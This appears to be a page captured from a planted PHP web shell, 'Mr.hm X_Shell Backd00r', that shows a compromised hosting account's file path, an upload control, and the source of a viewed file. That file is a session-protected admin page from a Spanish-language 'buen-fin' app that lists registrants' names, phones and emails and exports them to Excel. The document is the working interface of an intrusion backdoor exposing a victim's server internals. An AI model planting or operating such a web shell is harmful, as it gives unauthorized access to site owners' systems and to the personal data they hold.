[#] hm X_Shell Backd00r [#]

Current Path : /var/www/clients/client35/web46/web/buen-fin/app/registros/
Upload File :
Current File : /var/www/clients/client35/web46/web/buen-fin/app/registros/index.html.bak

<?php
session_start();
error_reporting(0);

$varSesion = $_SESSION['nombrePersona'];

  if($varSesion == null || $varSesion==''){
  
  echo "Error 404, por favor hable con su administrador";
  die();
  
  }
?>

<!doctype html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang=""> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang=""> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang=""> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang=""> <!--<![endif]-->
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <title></title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">

        <link rel="stylesheet" href="css/bootstrap.min.css">
        <link rel="stylesheet" href="css/bootstrap-theme.min.css">
        <link rel="stylesheet" href="css/main.css">
        <script src="js/vendor/modernizr-2.8.3.min.js"></script>
        <style>
          body{ font-family: 'lucida grande',tahoma,verdana,arial,sans-serif;}
          table{ font-size: 12px;}
          .container{max-width: 1024px;}
          h2{ text-align: right;}
          .form-group{width: 350px;display: inline-block;vertical-align: top; float: left;}
          .btn-search{ background-color: #428BCA; color:#ffffff;}
        </style>
    </head>
    <body>
        <!--[if lt IE 8]>
            <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->
      
      <!-- /container -->
      <div class="container">
        <img src="../../2015/junio/header-semana-mundial.jpg" class="img-responsive" alt="">
        <h2>

          <div class="form-group">
            <div class="input-group">
                <div class="input-group-btn">
                  <button type="button" class="btn btn-search"><span class="glyphicon glyphicon-search"></span></button>
                </div>
                <input type="text" name="txtSearch" id="txtSearch" value="" class="form-control" placeholder="Buscar Medio">
            </div>
          </div>   

          <small><a href="#" id="createExc"  data-toggle="tooltip" data-original-title="Todos los registros que fueron insertados a la base de datos se exportaran a un archivo Excel.">Descargar Excel <span class="glyphicon glyphicon-download-alt"></span></a></small>
        </h2>
        <table class="table table-striped">
          
          <thead>
            <tr>
              <th>Nombre</th>
              <th>Tel&eacute;fono fijo</th>
              <th>Tel&eacute;fono celular</th>
              <th>E-mail</th>
              <th>Cargo o funciones</th>
              <th>Medio</th>
            </tr>
          </thead>

          <tbody id="t-usuarios">
            
          </tbody>

        </table>
      </div>
        
      <!-- /container -->

      <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
      <script>window.jQuery || document.write('<script src="js/vendor/jquery-1.11.2.min.js"><\/script>')</script>
      <script src="js/vendor/bootstrap.min.js"></script>
      <script src="js/jquery.fileDownload.js"></script>
      <script src="js/main.js"></script>
      <script>
        $(document).ready(function(){
            $("a").tooltip({
                placement : 'bottom'
            });
        });
      </script>
    </body>
</html>

Mr.hm X_Shell Backd00r 1.0, Coded By Mr.hm X_Shell Backd00r